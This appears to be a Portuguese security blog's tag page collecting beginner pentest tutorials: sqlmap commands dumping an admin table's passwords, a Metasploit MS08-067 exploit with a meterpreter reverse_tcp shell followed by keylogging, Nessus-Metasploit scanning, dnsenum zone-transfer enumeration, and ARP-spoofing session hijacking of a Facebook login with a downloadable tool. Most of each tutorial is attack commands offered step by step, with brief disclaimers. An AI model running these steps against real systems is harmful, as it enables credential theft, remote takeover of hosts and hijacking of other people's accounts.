Anúncios

Arquivo

Posts Tagged ‘ethical hacker’

Tutorial: SQL Injection para quem está iniciando


Olá a todos mais uma vez

Segue agora uma dica excelente para Pentest, esse breve tutorial vai mostrar uns passos básicos para explorar a vulnerabilidade de SQL Injection em alguns sites.

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.

Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP

cd /pentest/database/sqlmap

Vamos executar o sqlmap

OBS: Os parametros dbs, dump, tables, columns devem ser precedidos de — (dois traços)

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 dbs (vc precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘  no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável)

O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD tables

Devemos trocar NOMEDOBD pelo valor obtido em “current database”

O Resultado vai ser algo parecido com isso:

Screenshot-4

Daí podemos escolher uma tabela e listar as colunas

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin columns

O resultado será parecido a esse:

Screenshot-6

Podemos escolher quais colunas queremos extrair informações

./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD -T admin -C id,passwrd,u_name dump

Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

Espero que tenham gostado

Por favor compartilhem

Anúncios

Explorando vulnerabilidades usando Metasploit Framework


Olá, na sequência de nosso último post gostaria de mostrar aqui a forma básica de se explorar uma vulnerabilidade, suponhamos o que sistema alvo tenha a vulnerabilidade MS 08-067 podemos usar localizar um exploit para ela usando o comando search exploits 08-067

Localizado o exploit vamos usá-lo para isso digite

use exploit/windows/smb/ms08_067_netapi

Depois show payloads para ver quais estão disponíveis daí faça a sequência de comandos

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST [IP do BACKTRACK]

set RHOST [IP DO ALVO]

exploit

Feito isso agora é só explorar as possibilidades de exploração como screenshots, keyloggers e muitas outras opções no sistema comprometido.

Gostou? Compartilhe por favor.

Se sua empresa precisa de Suporte Técnico e Consultoria acesse: www.infrasecurity.com.br

 

Usando Nessus e Metasploit juntos


Olá a todos

Nessa dica gostaria de mostrar como usar o nessus juntamente com o Metasploit, fazer isso auxilia muito na hora de encontrar e explorar vulnerabilidades nos sistemas alvo.

Para usar você precisa ter o Nessus instalado e configurado para uso seja no backtrack ou em outra máquina.

Vai precisar também do Metaspoit Framework do Backtrack 5 R3

Abra o Metasploit e na console digite load nessus para carregar o plugin do nessus.

Para conectar à sua instalação do nessus digite nessus_connect msf:msf@127.0.0.1:8843 ok

Mude o local onde está msf:msf pelo seu login e senha de acesso ao sistema Nessus e se necessário caso o Nessus esteja em outra máquina que não seja o Backtrack mude 127.0.0.1 para o IP do computador que tem o Nessus instalado.

Digite nessus_policy_list para ver quais as polices disponíveis para fazer o scan. Numa instalação padrão vai aparecer 4 opções

1- Internal Network Scan

2- External Network Scan

3- Web App Tests

4- Prepare for PCI-DSS audits

Com essa informação em mãos vamos criar um novo scan para isso digite nessus_scan_new 1 WindowsXP 192.168.2.93

No comando acima substitua pelo número ID da police que deseja usar, para teste numa rede local pode usar 1 mesmo. Onde está escrito WindowsXP você pode colocar o nome que desejar para identificar a rotina e evidentemente você deve substituir o IP pelo do seu sistema alvo.

Digite nessus_scan_status para acompanhar o progresso até a conclusão quando acabar digite nessus_report_list e você vai poder visualizar o id e nome do Scan que acabou de ser realizado para analisar as vulnerabilidades encontradas digite nessus_report_vulns 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Substitua 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc pelo ID que vai ser exibido pra você quando executar o nessus_report_list

Para importar esse relatório para o Metasploit digite nessus_report_get 9cc2ded8-150c-75cc-702c-92642f4cb626bbcaecbd84f094bc

Agora digite vulns e visualizará as vulnerabilidades encontradas.

Suponhamos, como exemplo, que tenha encontrado a Vulnerabilidade MS12-020 para localizar um exploit para ela digite search exploits 12-020

Daí é só ir explorando! No próximo post darei um exemplo de como explorar uma dessas vulnerabilidades.

Espero que tenham gostado e até a próxima.

Caso precise de Suporte e Consultoria acesse www.infrasecurity.com.br

Se gostou compartilhe!

Abraço

Tutorial: Obtendo informações de um servidor DNS usando dnsenum no Backtrack


Olá a todos mais uma vez

Ao se executar um pentest, a parte mais importante, mais trabalhosa e que vai demandar mais de nosso tempo é o Levantamento de informações, quanto mais informações conseguirmos melhor será nosso relatório final e a possibilidade de encontrarmos falhas no sistema testado.

Existem diversas ferramentas que auxiliam no levantamento de informações e uma das mais usadas para conseguir informação de um servidor DNS é o Dnsenum e vamos mostrar aqui como usar essa importante ferramenta, que é bem simples por sinal.

Usando o Backtrack podemos abrir um terminal e acessar o diretório /pentest/enumeration/dns/dnsenum

Para rodar a ferramenta basta digitar ./dnsenum.pl ele vai mostrar as opções de uso da ferramenta. Para um teste básico basta digitar o comando mais o domínio que deseja testar

Ex: ./dnsenum.pl exemplo.com

O Resultado obtido será semelhante ao abaixo:

 

Como podemos notar acima algumas informações importantes foram obtidas inclusive a transferencia de zona dos registros do DNS.

Em conclusão a recomendação é configurar corretamente o servidor DNS pelo menos para que ele não permita a transferência de Zona.

Obrigado e até a próxima! Não se esqueça de comentar e compartilhar.

Abraços

 

Tutorial: Sequestro de Sessão em aplicações WEB (session hijacking)


Olá a todos

Hoje eu gostaria de mostrar uma das maneiras de realizar uma técnica conhecida como sequestro de sessão (session hijacking), técnica essa que nos permite assumir o controle de uma aplicação web sem precisar ter os dados de login e senha.

Para o ataque vamos usar uma máquina com windows mesmo, também é preciso ter o firefox instalado, eu testei com o windows xp e usei a ferramenta Session Thief que pode ser baixada clicando no link abaixo

http://dl.dropbox.com/u/26229715/sessionthief.zip

OBS: Para rodar o programa precisa das bibliotecas do WinPcap para fazer o download caso não tenha pode baixar aqui http://www.winpcap.org/install/default.htm

Ao abrir a ferramenta no campo de baixo devemos colocar o IP da nossa vítima no meu caso 192.168.2.12, lembre-se que no seu caso vc deve mudar o IP de acordo com seu ambiente.

Clique no menu ARP e em seguida também na opção ARP 

Na parte de baixo aperte o botão Watch

Vai começar a mostrar as sessões disponíveis basta selecioná-as e clicar em Session, no caso, como podemos ver abaixo capturei uma sessão do facebook, obtive acesso ao perfil sem precisar digitar usuário e senha uma vez que “sequestramos” uma sessão já ativa.

Qualquer dúvida deixe um comentário aqui em baixo.

Dicas para se prevenir:

-Sempre que possível use a versão segura do site usando “https”

-Somente acesse de locais confiáveis

Lembre-se que isso é apenas para testes e aprendizado, nunca deve ser usado com intenções erradas.

Deixe seu comentário aqui em baixo e compartilhe por favor.

Abraço a todos e até o próximo

%d blogueiros gostam disto: